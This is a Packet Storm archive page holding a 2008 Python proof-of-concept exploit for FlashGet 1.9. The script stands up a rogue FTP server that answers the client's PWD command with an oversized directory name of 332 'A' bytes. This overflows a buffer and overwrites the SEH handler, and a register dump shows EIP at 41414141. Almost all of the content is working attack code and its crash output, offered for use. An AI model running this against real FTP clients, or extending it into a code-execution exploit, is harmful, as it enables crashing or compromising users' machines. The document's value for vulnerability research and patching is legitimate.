what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

flashget-overflow.txt

flashget-overflow.txt
Posted Aug 13, 2008
Authored by Krystian Kloskowski

FlashGet version 1.9 FTP PWD Response remote proof of concept buffer overflow exploit.

tags | exploit, remote, overflow, proof of concept
SHA-256 | 4717be597074ab3666f0b2540eefa529deec56009bc49551b3a090ceed9c8bd3
Download | Favorite | View

flashget-overflow.txt

Change Mirror Download
#!/usr/bin/python
# FlashGet 1.9 (FTP PWD Response) 0day Remote Buffer Overflow PoC Exploit
# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# Testen on: FlashGet 1.9 / XP SP2 Polish
# Product URL: http://www.flashget.com/en/download.htm?uid=undefined
# Details:..
#
# 257 "[AAAA..332]/" is current directory.\r\n <-- overflow
#
# 41414141  Pointer to next SEH record
# 41414141  SE handler
#
# ----------------------------------------------------------------
# Exception C0000005 (ACCESS_VIOLATION reading [41414141])
# ----------------------------------------------------------------
# EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# ECX=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EDX=7C9037D8: 8B 4C 24 04 F7 41 04 06-00 00 00 B8 01 00 00 00
# ESP=020D1260: BF 37 90 7C 48 13 0D 02-08 FF 1C 02 64 13 0D 02
# EBP=020D1280: 30 13 0D 02 8B 37 90 7C-48 13 0D 02 08 FF 1C 02
# ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EDI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EIP=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
#               --> N/A
# ----------------------------------------------------------------
# Just for fun ;]
##

from time import sleep
from socket import *

res = [
    '220 WELCOME!! :x\r\n',
    '331 Password required for %s.\r\n',
    '230 User %s logged in.\r\n',
    '250 CWD command successful.\r\n',
    '257 "%s/" is current directory.\r\n' # <-- %s B0f :x
    ]

buf = 'A' * 332

s = socket(AF_INET, SOCK_STREAM)
s.bind(('0.0.0.0', 21))
s.listen(1)
print '[+] listening on [FTP] 21 ...\n'
c, addr = s.accept()
c.send(res[0])

user = ''

for i in range(1, len(res)):
    req = c.recv(1024)
    print '[*][CLIENT] %s' % (req)
    tmp = res[i]
    if(req.find('USER') != -1):
        req = req.replace('\r\n', '')
        user = req.split('\x20', 1)[1]
        tmp %= user
    if(req.find('PASS') != -1):
        tmp %= user
    if(req.find('PWD') != -1):
        tmp %= buf    
    print '[*][SERVER] %s' % (tmp)    
    c.send(tmp)

sleep(5)
c.close()
s.close()

print '[+] DONE'

# EoF

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close